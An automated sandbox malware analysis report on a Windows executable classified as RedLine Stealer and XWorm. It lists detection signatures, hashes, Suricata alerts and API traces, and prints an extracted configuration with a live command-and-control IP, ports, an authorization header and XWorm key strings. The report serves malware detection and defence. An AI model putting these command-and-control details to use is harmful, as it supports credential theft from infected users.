Windows Analysis Report
7xonkSJwuY.exe

Overview

General Information

Sample name: 7xonkSJwuY.exe
renamed because original name is a hash value
Original sample name: 36881de84e2d129a6a32e7a5c5537aee.exe
Analysis ID: 1538405
MD5: 36881de84e2d129a6a32e7a5c5537aee
SHA1: 7e022793522c1f22103a5946ac4b204f3ab58706
SHA256: 9378bcf50d0a58428c5b2f7fd2284579927a48fd2e9d8f4f8395f932cb3db1a6
Tags: exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to detect sleep reduction / modifications
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Name Description Attribution Blogpost URLs Link
XWorm Malware with wide range of capabilities ranging from RAT to ransomware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection
barindex
Found malware configuration
Source: 2.2.RegSvcs.exe.6be0000.0.raw.unpack Malware Configuration Extractor: RedLine {"C2 url": ["162.251.122.86:5798"], "Bot Id": "success", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe ReversingLabs: Detection: 63%
Multi AV Scanner detection for submitted file
Source: 7xonkSJwuY.exe ReversingLabs: Detection: 63%
Source: 7xonkSJwuY.exe Virustotal: Detection: 30% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 7xonkSJwuY.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: 162.251.122.86
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: 57903
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: <123456789>
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: <Xwormmm>
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: XWorm V5.6
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack String decryptor: USB.exe
Uses 32bit PE files
Source: 7xonkSJwuY.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: wntdll.pdbUGP source: pteropod.exe, 00000001.00000003.1708097740.0000000004040000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000001.00000003.1709011475.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1871597600.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1875000927.0000000003E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: pteropod.exe, 00000001.00000003.1708097740.0000000004040000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000001.00000003.1709011475.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1871597600.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1875000927.0000000003E20000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452126
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 0_2_0045C999
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00436ADE
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00434BEE
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 0_2_00436D2D
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442E1F
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0045DD7C FindFirstFileW,FindClose, 0_2_0045DD7C
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD29
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00475FE5
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 1_2_00452126
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 1_2_0045C999
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00436ADE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00434BEE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 1_2_00436D2D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00442E1F
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0045DD7C FindFirstFileW,FindClose, 1_2_0045DD7C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 1_2_0044BD29
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_00475FE5
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_0044BF8D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 5_2_00452126
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 5_2_0045C999
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00436ADE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00434BEE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 5_2_00436D2D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00442E1F
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0045DD7C FindFirstFileW,FindClose, 5_2_0045DD7C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 5_2_0044BD29
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 5_2_00475FE5
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_0044BF8D
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then inc dword ptr [ebp-20h] 2_2_07088400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0708AF6Eh 2_2_0708AF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 071466FAh 2_2_07146438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 07145647h 2_2_07144EE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 07147172h 2_2_07146D46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 071475F2h 2_2_07146D46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0714D278h 2_2_0714CD80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0714AE72h 2_2_0714ABA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 07143A0Dh 2_2_07143602
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 07143A0Dh 2_2_07143630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 07149EB1h 2_2_07149E99

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.4:49732 -> 162.251.122.86:5798
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.4:49732 -> 162.251.122.86:5798
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 162.251.122.86:5798 -> 192.168.2.4:49732
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 162.251.122.86:57903 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 162.251.122.86:57903 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 162.251.122.86:5798 -> 192.168.2.4:49732
Source: Network traffic Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49730 -> 162.251.122.86:57903
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49730 -> 162.251.122.86:57903
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 162.251.122.86:5798
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 162.251.122.86 ports 0,3,5,7,9,5798,57903
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 162.251.122.86:57903
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: unknown TCP traffic detected without corresponding DNS query: 162.251.122.86
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile, 0_2_0044289D
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: RegSvcs.exe, 00000002.00000002.1929347646.00000000028E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegSvcs.exe, 00000002.00000002.1929347646.00000000028E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: RegSvcs.exe, 00000002.00000002.1929347646.00000000028E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegSvcs.exe, 00000002.00000002.1929347646.00000000028E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
